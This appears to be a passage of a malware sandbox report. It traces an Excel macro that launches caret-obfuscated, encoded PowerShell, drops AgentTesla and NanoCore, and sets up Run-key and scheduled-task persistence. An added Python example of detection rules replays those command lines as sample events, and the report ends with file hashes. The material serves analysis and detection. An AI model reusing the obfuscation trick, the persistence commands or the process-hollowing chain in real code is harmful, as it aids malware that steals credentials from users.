Reading the tree: the macro in the workbook runs cmd.exe with a caret-escaped PowerShell invocation (Po^W^ERS^he^LL), an evasion aimed at string matching on the cmd.exe command line; cmd strips the carets before launching the child, so the powershell.exe command line reads PoWERSheLL -E followed by an encoded payload that this extract elides. PowerShell drops and runs ei.exe, which establishes the "expo" Run key and launches expo.exe. expo.exe forks two payloads: ammero.exe, flagged by the family_agenttesla YARA rule (the SMTP exfiltration config above), and a copy of InstallUtil.exe placed in Temp that expo.exe hollows out. The hollowed InstallUtil.exe checks EnableLUA, drops udpss.exe into Program Files (x86)\UDP Subsystem, writes a machine-wide Run key and registers two scheduled tasks from Temp XML files; the paired "<name>" / "<name> Task" tasks and the "<name> Subsystem" install directory are NanoCore's characteristic persistence layout, matching the extracted NanoCore configuration.
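The following is an added example, not part of the sandbox report and not any product's detection content. It encodes the parent/child and command-line patterns visible in the tree above as rules and runs them over process-creation events constructed from that tree (images, PIDs and command lines as listed there). The PowerShell payload the report elides is replaced by a placeholder string, and explorer.exe as the parent of EXCEL.EXE is an assumption; the event layout and rule names are this example's own.

```python
"""Process-tree detection rules run over the chain in the tree above.

Added example, not from the sandbox report. SAMPLE_EVENTS is constructed from
the process tree; the elided PowerShell payload is a placeholder and the
explorer.exe parent of EXCEL.EXE is assumed. Rule names are this example's own.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the created process
    parent_image: str  # full path of its parent
    cmdline: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
DOTNET_FRAMEWORK = re.compile(r"\\microsoft\.net\\framework(?:64)?\\v\d", re.I)
# -e, -ec, -enc, -EncodedCommand: powershell.exe accepts any unambiguous prefix.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc(?:odedcommand)?)?\s", re.I)
XML_FROM_TEMP = re.compile(r'/xml\s+"?[^"\s]*\\temp\\', re.I)


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_shell(e: ProcEvent) -> bool:
    return base(e.parent_image) in OFFICE_APPS and base(e.image) in SHELLS

def caret_obfuscated_cmdline(e: ProcEvent) -> bool:
    # cmd.exe strips carets before starting the child, so the evasion is only
    # visible on the cmd.exe command line itself ("Po^W^ERS^he^LL").
    return e.cmdline.count("^") >= 2

def encoded_powershell(e: ProcEvent) -> bool:
    return base(e.image) == "powershell.exe" and bool(ENCODED_FLAG.search(e.cmdline))

def exe_in_user_writable_dir(e: ProcEvent) -> bool:
    return bool(USER_WRITABLE.search(e.image))

def shell_spawned_by_user_writable_exe(e: ProcEvent) -> bool:
    return base(e.image) in SHELLS and bool(USER_WRITABLE.search(e.parent_image))

def installutil_outside_framework(e: ProcEvent) -> bool:
    # The genuine InstallUtil.exe lives under %WINDIR%\Microsoft.NET\Framework*\v*.
    return base(e.image) == "installutil.exe" and not DOTNET_FRAMEWORK.search(e.image)

def reg_adds_run_key(e: ProcEvent) -> bool:
    cmd = e.cmdline.lower()
    return base(e.image) == "reg.exe" and " add " in cmd and "currentversion\\run" in cmd

def schtasks_xml_from_temp(e: ProcEvent) -> bool:
    return (base(e.image) == "schtasks.exe" and "/create" in e.cmdline.lower()
            and bool(XML_FROM_TEMP.search(e.cmdline)))


RULES = [office_spawns_shell, caret_obfuscated_cmdline, encoded_powershell,
         exe_in_user_writable_dir, shell_spawned_by_user_writable_exe,
         installutil_outside_framework, reg_adds_run_key, schtasks_xml_from_temp]


def evaluate(events):
    """Map each PID to the sorted names of the rules it triggers."""
    return {e.pid: sorted(r.__name__ for r in RULES if r(e)) for e in events}


def ancestry(events, pid):
    """Image names from pid up to the topmost process we hold an event for."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


# Constructed from the report's process tree (explorer.exe parent is assumed).
OFFICE = r"C:\Program Files (x86)\Microsoft Office\Office14"
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
ROAM = r"C:\Users\Admin\AppData\Roaming"
SYS = r"C:\Windows\SysWOW64"
PS = SYS + r"\WindowsPowerShell\v1.0\powershell.exe"
RUN_KEY = (r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" '
           r'/t REG_SZ /d "' + ROAM + r'\expo.exe"')
SAMPLE_EVENTS = [
    ProcEvent(2008, 1, OFFICE + r"\EXCEL.EXE", r"C:\Windows\explorer.exe",
              '"' + OFFICE + r'\EXCEL.EXE" /dde ' + TEMP + r"\RFQ#903_260921_new_request_10012_products.xls"),
    ProcEvent(1528, 2008, SYS + r"\cmd.exe", OFFICE + r"\EXCEL.EXE",
              r'"C:\Windows\System32\cmd.exe" /c Po^W^ERS^he^LL -E <payload elided in report>'),
    ProcEvent(1884, 1528, PS, SYS + r"\cmd.exe", "PoWERSheLL -E <payload elided in report>"),
    ProcEvent(1176, 1884, TEMP + r"\ei.exe", PS, '"' + TEMP + r'\ei.exe"'),
    ProcEvent(1060, 1176, SYS + r"\cmd.exe", TEMP + r"\ei.exe", '"cmd.exe" /c ' + RUN_KEY),
    ProcEvent(944, 1060, SYS + r"\reg.exe", SYS + r"\cmd.exe", RUN_KEY),
    ProcEvent(992, 1176, ROAM + r"\expo.exe", TEMP + r"\ei.exe", '"' + ROAM + r'\expo.exe"'),
    ProcEvent(1136, 992, ROAM + r"\ammero.exe", ROAM + r"\expo.exe", '"' + ROAM + r'\ammero.exe"'),
    ProcEvent(1512, 992, TEMP + r"\InstallUtil.exe", ROAM + r"\expo.exe", '"' + TEMP + r'\InstallUtil.exe"'),
    ProcEvent(1900, 1512, SYS + r"\schtasks.exe", TEMP + r"\InstallUtil.exe",
              r'"schtasks.exe" /create /f /tn "UDP Subsystem" /xml "' + TEMP + r'\tmpA4C.tmp"'),
    ProcEvent(968, 1512, SYS + r"\schtasks.exe", TEMP + r"\InstallUtil.exe",
              r'"schtasks.exe" /create /f /tn "UDP Subsystem Task" /xml "' + TEMP + r'\tmpC02.tmp"'),
]

if __name__ == "__main__":
    for pid, hits in evaluate(SAMPLE_EVENTS).items():
        print(pid, hits)
    print(" <- ".join(ancestry(SAMPLE_EVENTS, 968)))
```

Run stand-alone it prints the rule hits per PID and the ancestry of the last schtasks.exe back to EXCEL.EXE. Two design points follow from the tree: the caret rule has to be evaluated on the cmd.exe event, because the child powershell.exe never sees the carets, and the InstallUtil.exe rule keys on the image path rather than the name, since the sample runs a copy from Temp instead of the framework directory.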
Network
MITRE ATT&CK Enterprise v6
Downloads
The report lists one entry per dropped file path, and several paths carry the same file; the identical entries are collapsed here to the five distinct files. File names are not given in this extract.

- File 1 (listed 3 times)
  MD5: 91c9ae9c9a17a9db5e08b120e668c74c
  SHA1: 50770954c1ceb0bb6f1d5d3f2de2a0a065773723
  SHA256: e56a7e5d3ab9675555e2897fc3faa2dd9265008a4967a7d54030ab8184d2d38f
  SHA512: ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e
- File 2 (listed once)
  MD5: f7eb19c49b51cdff67a25c6876a78241
  SHA1: 6d86be501c2fb57b50292a55d3983b7eee8a688d
  SHA256: c9dab73a0044021d2acbc3952b19dea98cdfd838afc633197bd1bd12d2562fba
  SHA512: 1e94e363f9d4d0dcdfe0a8457642fcfe4f81dff0b39f1d1f00deab9291e133cd40b48c097dfe52c356d4a15c383e0aa08fae28b136937bcc57d5e01861716740
- File 3 (listed once)
  MD5: c4aecdef99eba873119e79616df3f4b0
  SHA1: b1b3af52655fb633eed909dfed05b64fbbfac37c
  SHA256: 24fd0d87bea36a024449a95f808aaa174e4ed9003cb8a427b67c02411b8a2e0b
  SHA512: e3f44b07267fccf4f5abd4efe80f2b037ddadc4cb898bdfca9d21ac5d79fcac828950065c2060d3ce125ee971fc3096183afee5287ba9951fbbda7257d8ed8d4
- File 4 (listed 3 times)
  MD5: 605e939e44cd9b02c55ce0a09019ad47
  SHA1: 9ac8ff474631ed0c3d27a7290979b4880b9784f6
  SHA256: 5ab99263d0101e00809c2fe1f068bbcb601208c3fb0efd753b36169a3a69c589
  SHA512: 5196b9b698a71dc4510a57acabaee22ec2cd3f35c7c82c0ccbc00673ee97b471019a79e4cdb1ec6b5765ef70f1b5aebc19f56b0fa6a9932844c8ae07ba8b2b9d
- File 5 (listed 3 times)
  MD5: 419179d921ed1c875e2c690ee521d516
  SHA1: 12750f63f89e8086d59948ebe3664473364f72dc
  SHA256: 99b390b6b37a14d651e2bfc9d4588385c13ab7a367129a9e753f6650f6867d54
  SHA512: 823bfb71c82aedef4449cd1a584a0810b050139368ce0bb801ae0be629fdecac98733e48f6978e1d08020031f9ace52d050123baf035cf1bb87bd4b15e2c9702